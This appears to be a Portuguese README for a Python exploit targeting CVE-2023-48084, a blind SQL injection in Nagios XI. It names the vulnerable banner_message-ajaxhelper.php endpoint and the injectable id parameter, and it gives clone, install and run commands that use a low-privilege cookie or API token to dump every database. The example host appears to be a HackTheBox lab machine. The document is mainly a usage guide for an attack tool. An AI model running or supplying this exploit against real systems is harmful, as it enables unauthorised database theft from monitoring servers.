
Programa em Python para despejar todos os bancos de dados, explorando a vulnerabilidade sqli do NagiosXI
Exploit em Python para o CVE-2023-48084 -> O Nagios XI antes da versão 5.11.3 foi descoberto por conter uma vulnerabilidade de injeção SQL através da ferramenta de modificação em massa.
O exploit usa /admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(<SQL COMMAND TO EXECUTE>) para executar consultas SQL, e explora uma injeção SQL cega...
Clone o repositório e instale o requirements.txt
git clone https://github.com/Hamibubu/CVE-2023-48084.git
cd CVE-2023-48084
pip install -r requirements.txt
Agora execute o programa, você precisa de um cookie de sessão não administrador, ou um token de API, exemplo
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -a <token>
python3 CVE-2023-48084.py --url https://monitored.htb/nagiosxi -c <cookie>
Por padrão, tentará despejar todo o banco de dados começando pelos schemas, se quiser que seja mais rápido, basta olhar o código e pegar a parte que você precisa